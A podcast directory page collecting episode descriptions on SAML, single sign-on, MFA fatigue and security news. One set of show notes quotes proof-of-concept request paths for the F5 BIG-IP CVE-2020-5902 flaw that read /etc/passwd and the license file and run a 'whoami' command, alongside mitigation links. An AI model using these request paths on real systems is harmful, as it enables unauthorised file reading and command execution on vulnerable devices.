Logo

    saml

    Explore "saml" with insightful episodes like "Unraveling unmanageable apps", "Episode 547: Nicholas Manson on Identity Management for Cloud Applications", "TECH-IT-OUT: MFA, SAML, Single Sign On Authentication and MFA Fatigue", "How SAML 2.0 Authentication Works?" and "2020-026- WISP PSA, PAN-OS vuln redux, F5 has a bad weekend, vuln scoring, Twitter advice, and more!" from podcasts like ""Cloud Security Today", "Software Engineering Radio - the podcast for professional software developers", "Krome Cast: Tech-IT-Out", "Protocol" and "Brakeing Down Security Podcast"" and more!

    Episodes (10)

    Unraveling unmanageable apps

    Unraveling unmanageable apps

    On this episode, co-founder and CEO of Cerby, Belsasar Lepe, joins Matt to talk about unmanageable applications (apps that don't support critical security standards like SSO and SCIM). Belsasar was previously the Head of Product at Impira, where he led the company's product life cycle, helping drive a 4x increase in revenue. Before his role at Impira, Bel was co-founder and CTO at Ooyala, where he led a global product, design, and engineering team of 300+ Ooyalans spanning five countries and seven offices. Ooyala achieved two successful exits totaling over $440M.

    Belsasar talks about unmanageable applications, Shadow IT, and why password managers should be considered legacy tech. 

     

    Timestamp Segments

    ·       [02:14] A bit about Belsasar.

    ·       [04:57] Unmanageable Applications.

    ·       [07:07] Shadow IT.

    ·       [11:04] Quantifying the risk.

    ·       [14:50] How to identify Unmanageable Apps.

    ·       [17:46] Using different tools.

    ·       [21:03] Where do password managers fall in?

    ·       [22:53] Is passwordless the future?

    ·       [25:29] How Cerby solves the problem.

    ·       [27:11] A Cerby success story.

    ·       [30:48] The future of the market.

    ·       [32:35] Migration to Cloud.

    ·       [35:03] How Belsasar stays fresh.

     

    Notable Quotes

    ·       “The first task is understanding the size of the problem.”

    ·       “The initial point of entry is often an unmanageable application.”

    ·       “More businesses will rely on end users for their security.”

    Cerby's website

    Secure applications from code to cloud.
    Prisma Cloud, the most complete cloud-native application protection platform (CNAPP).

    Disclaimer: This post contains affiliate links. If you make a purchase, I may receive a commission at no extra cost to you.

    TECH-IT-OUT: MFA, SAML, Single Sign On Authentication and MFA Fatigue

    TECH-IT-OUT: MFA, SAML, Single Sign On Authentication and MFA Fatigue

    In this episode of Krome Cast: Tech-IT-Out we discuss Multifactor Authentication, SAML Authentication, SSO Single Sign-On and how to protect users against MFA Fatigue.

    This tech panel podcast features Krome's Commercial Director, Sam Mager, along with Krome's Head of Security Operations, Paul Edwards, Technical Director Ben Randall, and CTO Rupert Mills, sharing their insights on MFA authentication best practises and how you can protect your organisation from an MFA Fatigue attack.

    ► ABOUT KROME: Krome Technologies is a technically strong, people-centric technology consultancy, focused on delivering end-to-end infrastructure and security solutions that solve business challenges and protect critical data. We work collaboratively with clients, forming long-term business partnerships, applying knowledge, experience and the resources our clients need to solve problems, design solutions and co-create agile, efficient and scalable IT services.

    ► KROME WEBSITE: https://www.krome.co.uk/ 

    ► CONTACT 
    • Telephone: 01932 232345 
    • Email: info@krome.co.uk

    ► ABOUT KROME: Krome Technologies is a technically strong, people-centric technology consultancy, focused on delivering end-to-end infrastructure and security solutions that solve business challenges and protect critical data. We work collaboratively with clients, forming long-term business partnerships, applying knowledge, experience and the resources our clients need to solve problems, design solutions and co-create agile, efficient and scalable IT services.

    ► KROME WEBSITE: https://www.krome.co.uk/

    ► SOCIAL MEDIA
    • YouTube: https://www.youtube.com/@krometechnologies
    • Linkedin: https://www.linkedin.com/company/krome-technologies-ltd
    • Instagram: https://www.instagram.com/krometechnologies/
    • Twitter: https://twitter.com/KromeTech
    • Facebook: https://www.facebook.com/KromeTechnologies/

    ► CONTACT
    • Telephone: 01932 232345
    • Email: info@krome.co.uk

    How SAML 2.0 Authentication Works?

    How SAML 2.0 Authentication Works?
    What is SAML 2.0? Security Assertion Markup Language (SAML) 2.0 is one of the most widely used open standard for authentication and authorizing between multiple parties. It’s one of the protocol that give users the single sign-on (SSO) experience for applications. The other adopted open standard is OAuth and OpenID. Of the two, SAML 2.0, released in 2005, remains the 800 pound gorilla in Enterprise SSO space. This post provides a detailed introduction on how SAML works
    Protocol
    enJanuary 18, 2022

    2020-026- WISP PSA, PAN-OS vuln redux, F5 has a bad weekend, vuln scoring, Twitter advice, and more!

    2020-026- WISP PSA, PAN-OS vuln redux, F5 has a bad weekend, vuln scoring, Twitter advice, and more!

    1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber

    #SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537

     F5 vulnerability:

    https://www.wired.com/story/f5-big-ip-networking-vulnerability/

    https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/

     

    F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258

    Redirect 404 /

     

    https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE

    F5 Big-IP CVE-2020-5902 LFI and RCE

    LFI

    https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

    or /etc/hosts

    or /config/bigip.license

    RCE

    https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami

    How to cope in a no-win situation:

    https://twitter.com/datSecuritychic/status/1280527467569008640

    F5 PoC vuln tweet

    Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.

    2020-025-Cognizant breach, maze ransomware, PAN-OS CVE 2020-2021, SAML authentication walkthrough

    2020-025-Cognizant breach, maze ransomware, PAN-OS CVE 2020-2021, SAML authentication walkthrough

    Thank you to Marcus Carey for his excellent guidance and leadership this week.

     

    Cognizant breach: https://www.ehackingnews.com/2020/06/cognizant-reveals-employees-data.html

    Maze ransomware write-up: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

    https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

     

    https://docs.paloaltonetworks.com/pan-os/9-0/pan-os-admin/authentication/authentication-types/saml

    PAN-OS CVE 2020-2021 - 

    We have been made aware of a serious issue with SAML on Palo Alto Networks PAN-OS

    We strongly encourage our customers to upgrade to one of the following versions :

    PAN-OS 8.1.15

    PAN-OS 9.0.9

    PAN-OS 9.1.3 and greater

    This is a critical vulnerability with the only mitigation being to either turn OFF SAML or to upgrade the PAN-OS.

    A CVE will be released on Monday ::  CVE-2020-2021

     

    https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language

    SAML description

    Imgur, Firefox, Uber, and Facebook - Hack Naked News #151

    Imgur, Firefox, Uber, and Facebook - Hack Naked News #151

    Paul and Michael report on an Exim-ergency, why Uber's in hot water, Firefox's new pwnage warnings, 1.7 million breached Imgur accounts, bidding farewell to SMS authentication, voting and security, and more on this episode of Hack Naked News!

    Full Show Notes: https://wiki.securityweekly.com/HNNEpisode151

    Visit http://hacknaked.tv to get all the latest episodes!

    Imgur, Firefox, Uber, and Facebook - Hack Naked News #151

    Imgur, Firefox, Uber, and Facebook - Hack Naked News #151

    Paul and Michael report on an Exim-ergency, why Uber's in hot water, Firefox's new pwnage warnings, 1.7 million breached Imgur accounts, bidding farewell to SMS authentication, voting and security, and more on this episode of Hack Naked News!

    Full Show Notes: https://wiki.securityweekly.com/HNNEpisode151

    Visit http://hacknaked.tv to get all the latest episodes!